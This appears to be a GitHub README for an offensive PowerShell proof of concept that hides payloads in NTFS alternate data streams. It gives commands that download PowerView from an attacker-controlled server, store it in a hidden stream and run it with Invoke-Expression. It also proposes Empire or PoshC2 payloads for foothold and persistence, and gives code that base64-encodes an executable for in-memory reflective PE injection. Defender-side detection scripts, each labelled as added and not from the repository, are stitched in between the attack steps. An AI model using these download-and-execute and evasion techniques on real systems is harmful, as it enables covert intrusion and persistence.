davehardy20/Alternate-Data-Streams

Alternate-Data-Streams with PowerShell

I literally stumbled upon this whilst reading up on the parameters for the Get-Content and Set-Content cmdlets for another piece of research. The parameter that got my interest is -Stream, which lets the user read and write NTFS alternate data streams. We start by creating a file with the following commands:

$file = "$env:TEMP\test.txt"
Set-Content -Path $file -Value 'Alternate Data Stream Test File'

To read the file content, we use the following;

Get-Content -Path $file

Which will return;

Alternate Data Stream Test File

Hiding Content

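As I mentioned above, the -Stream parameter lets the user access the 'hidden' NTFS Alternate Data Stream (ADS). A simple example using the file created above: the first command writes a value into a stream named hiddenstream, and the second reads it back.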

Add-Content -Path $file -Value 'Hidden Data' -Stream 'hiddenstream'

Get-Content -Path $file -Stream 'hiddenstream'
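
A stream written this way does not appear in a default directory listing and is not counted in the file's reported length. The following added example (not part of this repository) lists named streams from the defender's side; the function name, parameters and ignore list are assumptions, and it expects Windows PowerShell 3.0 or later on an NTFS volume.

```powershell
# Added example, not from the repository. Names below are hypothetical.
function Find-AlternateDataStream {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)]
        [string] $Path,

        # Streams Windows creates itself (mark-of-the-web) and that are usually benign.
        [string[]] $IgnoreStream = @('Zone.Identifier'),

        [switch] $Recurse
    )

    Get-ChildItem -LiteralPath $Path -File -Recurse:$Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $item = $_
            # -Stream * returns every stream; ':$DATA' is the unnamed default stream
            # that holds the normal file content.
            Get-Item -LiteralPath $item.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -notin $IgnoreStream } |
                ForEach-Object {
                    [pscustomobject]@{
                        File          = $item.FullName
                        Stream        = $_.Stream
                        StreamLength  = $_.Length        # bytes held in the named stream
                        FileLength    = $item.Length     # bytes in the default stream only
                        LastWriteTime = $item.LastWriteTime
                    }
                }
        }
}

# Demo on a constructed file that mirrors the commands above.
$demoDir  = Join-Path $env:TEMP ('ads-demo-' + [guid]::NewGuid())
New-Item -ItemType Directory -Path $demoDir | Out-Null
$demoFile = Join-Path $demoDir 'test.txt'
Set-Content -Path $demoFile -Value 'Alternate Data Stream Test File'
Add-Content -Path $demoFile -Value 'Hidden Data' -Stream 'hiddenstream'

Get-ChildItem -LiteralPath $demoDir                    # default listing, for comparison
Find-AlternateDataStream -Path $demoDir | Format-List  # named streams found under the folder

Remove-Item -LiteralPath $demoDir -Recurse -Force      # clean up the demo folder
```

A named stream whose length is far larger than the file's own content, on a file in a user-writable location, is worth a closer look.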

Something More Useful

This is great, but not much use on its own, so what if we could hide something a touch more useful, say PowerView? Taking the simple Proof of Concept - alternate-data-stream.txt from the repository, we create a new file as above and put some content in the file; however, we now download a payload (PowerView.ps1 in this example) from a webserver we control and hide it in an NTFS Alternate Data Stream (called powerview). Finally, we grab the content from the ADS and execute it.

$file = "$env:TEMP\test.txt"
Set-Content -Path $file -Value 'Alternate Data Stream Test File'
Get-Content -Path $file
Alternate Data Stream Test File

$pvfile = Invoke-WebRequest -Uri http://192.168.0.105:8000/powerview.ps1
Add-Content -Encoding Byte -Path $file -Value $pvfile.Content -Stream 'powerview'
Invoke-Expression (Get-Content -Path $file -Stream 'powerview' -Raw)
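
The last line above reads a named stream and passes it straight to Invoke-Expression, which is the pattern a defender can look for in PowerShell script block logs (event ID 4104). The following is an added example, not part of this repository; the function name, severity labels and patterns are assumptions, the first two sample strings are commands shown on this page and the third is constructed.

```powershell
# Added example, not from the repository. Names and patterns below are hypothetical.
function Test-AdsScriptPattern {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [AllowEmptyString()]
        [string] $ScriptText
    )
    begin {
        # Content cmdlets (and their common aliases) used with -Stream in one statement.
        $streamRead  = '\b(Get-Content|gc|cat|type)\b[^|;\r\n]*\s-Stream\b'
        $streamWrite = '\b(Add-Content|Set-Content|ac|sc)\b[^|;\r\n]*\s-Stream\b'
        # Constructs that turn a string into running code.
        $execSink    = '\b(Invoke-Expression|iex)\b|\[scriptblock\]::Create'
    }
    process {
        # -match is case-insensitive by default in PowerShell.
        $reads  = $ScriptText -match $streamRead
        $writes = $ScriptText -match $streamWrite
        $execs  = $ScriptText -match $execSink

        # Reading a named stream and executing a string in the same block ranks highest.
        $severity = if ($reads -and $execs) { 'High' } elseif ($reads -or $writes) { 'Review' } else { 'None' }

        [pscustomobject]@{
            Severity       = $severity
            ReadsStream    = $reads
            WritesStream   = $writes
            ExecutesString = $execs
            Text           = $ScriptText
        }
    }
}

# Sample input: two commands from this page and one constructed benign command.
$samples = @(
    'Invoke-Expression (Get-Content -Path $file -Stream ''powerview'' -Raw)'
    'Add-Content -Path $file -Value ''Hidden Data'' -Stream ''hiddenstream'''
    'Get-Content -Path C:\Logs\app.log -Tail 20'
)
$samples | Test-AdsScriptPattern | Format-Table -AutoSize

# Against real data (script block logging must be enabled):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { $_.Message } |
#     Test-AdsScriptPattern |
#     Where-Object Severity -ne 'None'
```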

Taking things further, I put together a PowerShell script that creates a random filename with a randomish amount of random content and a random ADS name. The script asks the user for the URI of the payload, downloads it and embeds it into the ADS of the freshly created file. The POC then retrieves and executes the downloaded content from the ADS of the random file. Also in this example the download process is able to detect web proxy settings and use the current user's credentials (proxy aware).

The script should be run dot-sourced, i.e.

. ./Invoke-ADS.ps1

The screenshot below shows PowerView being pulled from a web server, being stored in a file/ADS then retrieved and executed.

Further uses could be to download a payload, say a standard PoshC2 or Empire payload, hide it in the ADS of a file and use this as the initial foothold and a persistence method. Or perhaps a full executable stored in a PowerShell script and executed using Invoke-ReflectivePEInjection.ps1, similar to the way Invoke-Mimikatz.ps1 works. If we look inside the Invoke-Mimikatz script, the author's notes at around line 56 state 'This script was created by combining the Invoke-ReflectivePEInjection script written by Joe Bialek and the Mimikatz code written by Benjamin DELPY'.

So to achieve a similar outcome with an executable of your making, the process is essentially to encode your exe, store it in $PEBytes and call the Invoke-ReflectivePEInjection function.

I've added a couple of scripts to give a proof of concept. The first script, Convert-ExeToString.ps1, takes the path of the exe payload you want to encode; its output is a base64 encoded string of the exe bytes.

<#
A dirty script to take the path to an .exe read all the bytes and base64 encode.
#>

function Convert-ExeToString {
 
   [CmdletBinding()] param (
 
      [string] $File
   )
  $ByteArray = [System.IO.File]::ReadAllBytes($File);
  if ($ByteArray) {
      $Base64String = [System.Convert]::ToBase64String($ByteArray);
   }
   Write-Output -InputObject $Base64String;
}

Import-Module .\Convert-ExeToString.ps1
Convert-ExeToString -File ~/Desktop\PoSH_Bypass_Payload.exe

Now take the encoded output and create a script similar to the example script Example-ReflectivePayload.ps1, shown below:

<#
Place the output from the Convert-ExeToString script in the $ExeBytes variable.
Below, this is where Invoke-ReflectivePEInjection.ps1 is copied/pasted in full; I've clipped it here
as it's a large script.
Finally we convert the Base64 encoded exe bytes back to a format that can be injected into memory.
#>
 
$ExeBytes = '<Base64 output from Convert-ExeToString goes here>'
 
function Invoke-ReflectivePEInjection
 
{
 
<#
Copy / paste the entire Invoke-ReflectivePEInjection.ps1 script here
#>
 
}
 
#Decode the $ExeBytes
$PEBytes = [System.Convert]::FromBase64String($ExeBytes)
 
#Inject the exe in memory and run it with Invoke-ReflectivePEInjection
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"

Now host this script on your web server and use the Invoke-ADS.ps1 POC to download and embed the script into an ADS and execute or use another method of your choice.

The options here are as broad and varied as your imagination.
